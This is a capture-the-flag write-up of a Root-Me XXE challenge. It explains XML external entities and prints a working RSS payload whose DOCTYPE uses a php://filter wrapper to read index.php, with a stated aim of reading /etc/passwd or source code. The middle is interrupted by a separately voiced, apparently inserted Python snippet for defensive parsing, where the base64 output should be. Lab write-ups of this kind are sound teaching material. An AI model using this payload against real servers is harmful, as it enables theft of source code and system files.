FIRST OF ALL, WHAT IS XML? PLEASE READ IT SLOWLY.
https://www.w3schools.com/xml/xml_whatis.asp
OR WATCH THIS VIDEO ON YOUTUBE FOR FURTHER INFORMATION ABOUT XML AND XXE INJECTION.
https://www.youtube.com/watch?v=DREgLWZqMWg
ALRIGHT! NOW WE HAVE BASIC KNOWLEDGE ABOUT XML AND MORE. IN XML, THERE ARE TWO TYPES OF DTD: INTERNAL AND EXTERNAL.
DTD STANDS FOR DOCUMENT TYPE DEFINITION, WHICH DEFINES THE STRUCTURE AND THE LEGAL ELEMENTS AND ATTRIBUTES OF AN XML DOCUMENT. WITH A DTD, GROUPS OF PEOPLE CAN AGREE ON A STANDARD DTD OR DATA STRUCTURE FOR INTERCHANGING DATA.
FOR XXE INJECTION, WE MUST FOCUS ON THE EXTERNAL ENTITY, WHICH HAS THE SYNTAX BELOW:
<!ENTITY entity-name SYSTEM "URL/URI">
AND WE USE XML TO "READ" THIS DTD:
<article>&entity-name;</article>
EXAMPLE:
<!ENTITY writer SYSTEM "https://www.article.com/entity.dtd">
<author>&writer;</author>
THE OUTPUT IS THE CONTENT FETCHED FROM https://www.article.com/entity.dtd
NOW LET'S LOOK THROUGH THE XXE CHALLENGE ON ROOT-ME.
THE QUESTION IS: "WHAT IS RSS?"
RSS is short for Really Simple Syndication and it’s a way to have information delivered to you instead of you having to go find it. RSS BELONGS TO THE XML FAMILY. SO CLEARLY, WE MUST INPUT A LINK TO RSS CODE TO VALIDATE THIS CHECKER ENGINE. AFTER SEARCHING, I HAD A SIMPLE XML RSS SOURCE FROM W3C:
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>W3Schools Home Page</title>
<link>https://www.w3schools.com</link>
<description>Free web building tutorials</description>
<item>
<title>RSS Tutorial</title>
<link>https://www.w3schools.com/xml/xml_rss.asp</link>
<description>New RSS tutorial on W3Schools</description>
</item>
<item>
<title>XML Tutorial</title>
<link>https://www.w3schools.com/xml</link>
<description>New XML tutorial on W3Schools</description>
</item>
</channel>
</rss>
BECAUSE THE INPUT ONLY ACCEPTS A LINK, WE HAVE TO FIND SOMEWHERE TO HOST THIS CODE, AND I CHOSE PASTEBIN.
https://pastebin.com/raw/9T5CE8Tj
AFTER INPUTTING THIS LINK, I COMPLETELY VALIDATED THIS CHECKER ENGINE.
FIRST STEP DONE! BUT THE GOAL IS TO RETRIEVE THE PASSWORD. WE MUST READ THE FILE /etc/passwd OR THE SOURCE CODE OF THIS CHALLENGE. LET'S USE OUR KNOWLEDGE ABOUT XML AND DTD.
AFTER 3 HOURS OF SEARCHING AND TESTING, I COMPLETED THE PAYLOAD:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE rss [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]>
<rss version="2.0">
<channel>
<title>W3Schools Home Page</title>
<link>https://www.w3schools.com</link>
<description>Free web building tutorials</description>
<item>
<title>&xxe;</title>
<link>https://www.w3schools.com/xml/xml_rss.asp</link>
<description>New RSS tutorial on W3Schools</description>
</item>
<item>
<title>XML Tutorial</title>
<link>https://www.w3schools.com/xml</link>
<description>New XML tutorial on W3Schools</description>
</item>
</channel>
</rss>
THE HIGHLIGHTED LINES (THE DOCTYPE DECLARATION AND THE &xxe; REFERENCE) ARE WHAT I INJECTED INTO THE CODE, FORCING THE SERVER TO RESPOND WITH THE SOURCE CODE!
php://filter/read=convert.base64-encode/resource=index.php READS THE SOURCE CODE VIA THE PHP WRAPPER.
<title>&xxe;</title> PRINTS THE VALUE OF THE FILE TO THE SCREEN; THIS REFERENCE WAS PLACED IN THE ITEM TAG SO THAT THE RESULT IS PRINTED.
AFTER N (N>40) TRIES, I WAS REFUSED BECAUSE OF THE SERVER'S FILTER. SO I DECIDED TO ENCODE IT WITH BASE64 IN THE PHP WRAPPER QUERY. FORTUNATELY THE OUTPUT IS EXACTLY WHAT I EXPECTED.
THE BASE64 CODE WAS:
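As an added defensive example (not from the original writeup), here is a hardened RSS reader in Python that refuses any DOCTYPE before the internal subset is read, so the ENTITY declaration in the payload above is never parsed, and that refuses external entity references as a second line of defence. The sample feeds are constructed, and the names parse_item_titles and feed_is_safe are my own.

```python
# Added example (not the writeup's code): a hardened RSS reader that refuses
# any DOCTYPE, so <!ENTITY xxe SYSTEM "php://filter/..."> is never processed.
import xml.parsers.expat as expat

class UnsafeXmlError(ValueError):
    """Raised when a feed carries a DTD or references an external entity."""

def parse_item_titles(feed):
    """Return the <item><title> texts of an RSS feed, rejecting any DTD."""
    p = expat.ParserCreate()
    titles, stack, buf = [], [], []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset "[ ... ]" is read, so the ENTITY
        # declaration inside it is never parsed, let alone resolved.
        raise UnsafeXmlError("DOCTYPE not allowed: " + name)

    def reject_external(context, base, sysid, pubid):
        # Defence in depth: never fetch file://, http:// or php:// targets.
        raise UnsafeXmlError("external entity refused: %r" % (sysid,))

    def end(name):
        if stack[-2:] == ["item", "title"]:
            titles.append("".join(buf).strip())
        stack.pop()

    p.StartDoctypeDeclHandler = reject_doctype
    p.ExternalEntityRefHandler = reject_external
    p.StartElementHandler = lambda name, attrs: (stack.append(name), buf.clear())
    p.CharacterDataHandler = buf.append
    p.EndElementHandler = end
    p.Parse(feed, True)
    return titles

def feed_is_safe(feed):
    """True when the feed parses without any DTD or external entity."""
    try:
        parse_item_titles(feed)
    except UnsafeXmlError:
        return False
    return True

# Constructed sample inputs: a benign feed and the writeup's XXE payload.
BENIGN_FEED = ('<?xml version="1.0" encoding="UTF-8" ?><rss version="2.0"><channel>'
               '<title>Home</title><item><title>RSS Tutorial</title></item>'
               '<item><title>XML Tutorial</title></item></channel></rss>')
XXE_FEED = ('<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE rss [ <!ENTITY xxe SYSTEM '
            '"php://filter/read=convert.base64-encode/resource=index.php"> ]>'
            '<rss version="2.0"><channel><item><title>&xxe;</title></item></channel></rss>')
```

Rejecting the DTD outright (rather than only external entities) is the usual recommendation, since it also stops internal-entity tricks such as entity expansion bombs.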
DECODING IT GAVE ME THE FLAG FOR 35 POINTS! 😀
HAPPY HACKING!